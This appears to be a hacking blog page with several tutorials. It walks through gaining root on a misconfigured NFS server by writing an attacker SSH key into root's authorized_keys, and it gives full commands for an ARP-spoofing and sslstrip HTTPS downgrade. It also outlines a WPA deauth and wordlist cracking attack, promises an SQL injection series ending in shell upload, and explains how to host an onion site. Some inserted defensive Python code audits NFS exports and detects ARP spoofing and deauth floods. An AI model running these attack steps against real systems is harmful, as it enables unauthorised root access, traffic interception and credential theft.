Exploit a Misconfigured NFS Server | SSH | RPCbind

What is an NFS Server?

NFS (Network File System) is a client-server system that allows clients to access shared files over a network and to mount the directories the server exports. We are going to access such a file system and import our SSH key into root's authorized keys file to gain root access via SSH. At the end I will explain how to prevent this type of attack on your server.

Let the victim IP be

Open a terminal and type rpcinfo -p ; this will return all the registered RPC programs.

Many people get the error "rpcinfo: command not found"; install it with sudo apt update && sudo apt install rpcbind

Type sudo showmount -e ; this will return the exported (mountable) directories.

/ * means the root directory (/) is exported to every host (*).
Now create a temporary directory for the mount: mkdir /tmp/dir . Then mount the NFS export onto it: mount -o nolock -t nfs /tmp/dir

Now generate an SSH key pair with ssh-keygen ; this creates the private key in /home/h0nk3r/.ssh/id_rsa and the public key in /home/h0nk3r/.ssh/id_rsa.pub

Now import the key: cat /home/h0nk3r/.ssh/id_rsa.pub >> /tmp/dir/root/.ssh/authorized_keys . This appends your public key to root's authorized_keys on the NFS server, which lets you log in as root over SSH. Then unmount the shared directory: umount /tmp/dir


Now you can connect directly to the server: ssh root@


If I were the owner of this server, I would manage users with groups and specific privileges, and never use the root directory as the export (mount point).
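The check an owner would run to catch exactly this misconfiguration: an audit of /etc/exports that flags a share exporting / to every host, writable, with remote root kept as uid 0. This is example code added for this page, not part of nfs-utils; the WEAK and HARDENED export lines are constructed.

```python
"""Audit an /etc/exports file for the misconfiguration this post abuses.
Example code for this page, not nfs-utils code; sample exports are constructed."""
import re
from typing import List, Set, Tuple

SENSITIVE = {"/", "/root", "/etc"}
CLAUSE_RE = re.compile(r"([^(]*)(?:\((.*)\))?")   # client(opt,opt) or bare client


def parse_exports(text: str) -> List[Tuple[str, str, Set[str]]]:
    """Return (path, client, options) per client clause. A clause without
    options gets the nfsd defaults (ro, root_squash, secure); a line with
    no client at all exports to everyone."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for clause in clients or ["*"]:
            m = CLAUSE_RE.fullmatch(clause)
            if not m:
                continue
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, m.group(1) or "*", opts))
    return entries


def audit_exports(text: str) -> List[str]:
    """One finding per risky property of each export clause."""
    findings = []
    for path, client, opts in parse_exports(text):
        where = f"{path} -> {client}"
        everyone = client == "*" or client.endswith("/0")
        if (path.rstrip("/") or "/") in SENSITIVE:
            findings.append(f"{where}: exports a sensitive path")
        if everyone:
            findings.append(f"{where}: exported to every host")
        if "no_root_squash" in opts:
            findings.append(f"{where}: remote root keeps uid 0 (no_root_squash)")
        if "rw" in opts and everyone:
            findings.append(f"{where}: writable by every host")
        if "insecure" in opts:
            findings.append(f"{where}: accepts requests from unprivileged ports (insecure)")
    return findings


# Constructed examples: the export the post relies on, then a restricted one.
WEAK = "/ *(rw,no_root_squash)\n"
HARDENED = "/srv/share 192.168.1.0/24(ro,root_squash,sync)  # LAN only, read-only\n"

if __name__ == "__main__":
    for finding in audit_exports(WEAK) or ["no findings"]:
        print(finding)
```

Run it against the real file with audit_exports(open("/etc/exports").read()); an empty list means none of the properties above is present, not that the export is safe in every other respect.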


Sorry if I made any conceptual or grammatical mistakes, as I am not good at English.
Hope you had a nice read; keep coming back to hacknews.

Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with Tor on Linux

The dark web is very useful for staying anonymous: you can get your own .onion website and host it on the wide area network for free.
I assume you are using Kali Linux or Parrot Security OS. Open a terminal and install Tor with sudo apt-get install tor ; after that you just need to edit a few things in Tor's configuration file.

Open a terminal, type cd /etc/tor and then ls to list the directory; you will see the torrc file there, which you have to edit.

Open this file in your favorite text editor and add two lines:
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local IP with ifconfig
Open your file manager as root and go to /var/lib/tor/hidden_service ; there you will find your website's .onion address.
And boom, you've done it. Finally start Tor with sudo service tor start and Apache with sudo service apache2 start

NOTE: Now you face a problem: the site can't be reached! Here is the solution.

Forward your port | Go on the Internet

This just makes a connection between your local IP and the internet so you can access your website worldwide.
For more about port forwarding click here
I suggest you use ngrok; to download it click here, it is available for all systems.
After downloading, you just forward your port with ./ngrok http 80 for HTTP, so your Apache server will be on the WAN and your onion site can reach it.
After forwarding your port you will see something like this:

Just copy this link, 4f28046d.ngrok.io, and paste it where you put your local IP earlier in the torrc file, save it again and restart Tor; now you can access your Apache site through the onion site.
Put your website in /var/www and boom, your website is ready to share on social media.



HTTPS downgrade to HTTP | Bypasss HSTS | SSLStrip | ARP poisoning

Introduction to HSTS, ARP and sslstrip

HTTP Strict Transport Security (HSTS) is a web security policy that protects against protocol downgrade attacks and cookie hijacking. The Address Resolution Protocol (ARP) performs a required function in IP routing: it finds the hardware address, also known as the Media Access Control (MAC) address, of a host from its known IP address, and maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM tool that forces a web browser to downgrade https:// URLs to http:// URLs.

You have to forward IP traffic with iptables and send fake ARP requests.


Let's do it.

MITMf (Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf : simply download this framework from GitHub (git clone) or install it with sudo apt-get install mitmf
With mitmf -h you can see the help section.

-i: to specify the interface we want to run the MITM attack through;
--spoof: to redirect or modify the hijacked traffic;
--arp: to specify that we want to redirect the traffic through ARP spoofing;
--hsts: to load the SSLStrip+ plugin;
--dns: to load a proxy to modify DNS queries;
--gateway: to specify the gateway;
--target: to specify the target.

run mitmf --spoof --arp -i <interface name> --target <target IP> --gateway <gateway IP> --hsts

Get the target's local IP with netdiscover or by scanning your local network with nmap, and the gateway IP with ip route or route -n


Open a terminal and enable IP forwarding with echo 1 > /proc/sys/net/ipv4/ip_forward

Start arpspoof with arpspoof -i eth0 -t victimip default_gateway_ip

Set up port redirection with iptables: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Finally launch sslstrip: sslstrip -l 10000

Now open a new terminal and watch the results: tail -n 50 -f sslstrip.log
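From the victim's side, the arpspoof step above leaves two tell-tale marks in the ARP cache: the gateway's MAC address changes, and one MAC suddenly answers for two IP addresses. The detector below compares two ip neigh show snapshots for those marks; it is example code added for this page, and the BEFORE and AFTER snapshots are constructed, not real captures.

```python
"""Spot ARP-spoofing symptoms in `ip neigh show` output on a victim host.
Example code for this page; the snapshots below are constructed."""
import re
from collections import defaultdict
from typing import Dict, List

# "192.168.1.1 dev eth0 lladdr 00:1a:2b:3c:4d:01 REACHABLE"; FAILED/INCOMPLETE
# entries carry no lladdr and are skipped.
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17})", re.I)


def parse_neigh(output: str) -> Dict[str, str]:
    """Map IP -> MAC (lower-cased) from `ip neigh show` output."""
    table = {}
    for line in output.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def arp_alerts(before: str, after: str, gateway: str) -> List[str]:
    """Alert when the gateway's MAC changed between snapshots, or when a
    single MAC claims more than one IP in the newer snapshot."""
    old, new = parse_neigh(before), parse_neigh(after)
    alerts = []
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        alerts.append(f"gateway {gateway} moved from {old[gateway]} to {new[gateway]}")
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {', '.join(sorted(ips))}")
    return alerts


# Constructed snapshots: .50 is the host that later answers for the gateway.
BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:1a:2b:3c:4d:01 REACHABLE
192.168.1.50 dev eth0 lladdr 00:1a:2b:3c:4d:50 STALE
192.168.1.77 dev eth0  FAILED
"""
AFTER = """\
192.168.1.1 dev eth0 lladdr 00:1a:2b:3c:4d:50 REACHABLE
192.168.1.50 dev eth0 lladdr 00:1a:2b:3c:4d:50 REACHABLE
"""

if __name__ == "__main__":
    for alert in arp_alerts(BEFORE, AFTER, "192.168.1.1"):
        print("ALERT:", alert)
```

A permanent neighbour entry for the gateway (ip neigh replace ... nud permanent) or dynamic ARP inspection on the switch stops the cache from being rewritten in the first place; this script only tells you after the fact that it was.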



WIFI Hacking Tutorial: Using Aircrack, DeAuth and Wordlists to hack WIFI networks

Our tutorial today is about WiFi hacking using the deauth attack, most useful for attacking WPA/WPA2 networks. It works by capturing a handshake and recovering the passphrase from it with a wordlist.
The system used in the tutorial is Kali Linux, but it will work on any .deb-based system (Debian, Mint, Ubuntu, etc.), and the technique will not be much different on other distributions either.

1: The tutorial is pretty straightforward and starts by putting your network adapter in monitor mode using AIRMON-NG.

2: Next we use AIRODUMP-NG to monitor and capture packets. Your network adapter receives beacons, which gives you a clear view of all the WiFi networks around you. From this list you select the correct BSSID and channel.

3: Using AIREPLAY-NG with the correct BSSID and channel, we launch a deauth attack with a simple command, then wait until a so-called "handshake" is captured.

4: Close all the processes and start cracking the .cap (capture) file with a wordlist, using AIRCRACK-NG. Any wordlist saved as a .txt file will do; the bigger the wordlist, the better your chance of cracking it.
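Step 3 works because an access point cannot authenticate management frames, so a monitoring host can at least recognise the flood. The detector below parses raw 802.11 deauthentication and disassociation frames (radiotap header already stripped) and flags a BSSID that is hit with a burst of them, or with any frame aimed at the broadcast address. This is example code added for this page, not part of the aircrack-ng suite; the frames it parses are constructed in memory and never transmitted.

```python
"""Detect 802.11 deauth/disassoc floods in captured management frames.
Example code for this page; test frames are constructed, not transmitted."""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH, DISASSOC = 0xC0, 0xA0  # frame-control byte 0: mgmt type, subtypes 12 and 10
HDR = "<H H 6s 6s 6s H H"       # FC, duration, addr1, addr2, addr3, seq ctl, reason code


def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt(frame: bytes):
    """Return (kind, receiver, transmitter, bssid, reason) for a deauth or
    disassoc frame, or None for any other frame (beacons, data, ...)."""
    if len(frame) < struct.calcsize(HDR) or frame[0] not in (DEAUTH, DISASSOC):
        return None
    _fc, _dur, a1, a2, a3, _seq, reason = struct.unpack(HDR, frame[:26])
    kind = "deauth" if frame[0] == DEAUTH else "disassoc"
    return kind, mac(a1), mac(a2), mac(a3), reason


def detect_flood(frames, window=2.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_frame). A BSSID is flagged when
    more than `threshold` deauth/disassoc frames arrive within `window`
    seconds, or when one is addressed to the broadcast MAC (a real AP rarely
    kicks every client at once)."""
    recent, alerts = defaultdict(list), set()
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        kind, rx, _tx, bssid, _reason = parsed
        if rx == BROADCAST:
            alerts.add((bssid, f"broadcast {kind}"))
        recent[bssid] = [t for t in recent[bssid] if ts - t <= window] + [ts]
        if len(recent[bssid]) > threshold:
            alerts.add((bssid, f"{kind} flood"))
    return sorted(alerts)


def build_frame(fc, rx, tx, bssid, reason=7):
    """Constructed test frame (in memory only): duration 0, sequence 0."""
    raw = lambda s: bytes.fromhex(s.replace(":", ""))
    return struct.pack(HDR, fc, 0, raw(rx), raw(tx), raw(bssid), 0, reason)


AP = "00:11:22:33:44:55"  # constructed BSSID
SAMPLE = [(0.05 * i, build_frame(DEAUTH, BROADCAST, AP, AP)) for i in range(12)]

if __name__ == "__main__":
    print(detect_flood(SAMPLE))
```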

Extra: A good wordlist to use is the RockYou wordlist, which is available for download here.

Below is a full tutorial video showing you the exact commands and steps in detail, so you will never make a mistake when you carry out your attack!

With credits to Razzor Sharp for his amazing video!

SQL injection tutorial – A step by step guide (4 parts)

Are you interested in learning about hacking? Perhaps you have imagined hacking a website and uploading your own custom message to it? Today we want to introduce you to SQL injection. The guide below comes in 4 parts and takes you from beginner to advanced in less than an hour. The final part is about uploading a shell as an image.

Remember, these tutorials are for educational purposes only.

SQL injection tutorial – A step by step guide – Part 1:

SQL injection tutorial – A step by step guide – Part 2:

SQL injection tutorial – A step by step guide – Part 3:

SQL injection tutorial – A step by step guide – Part 4: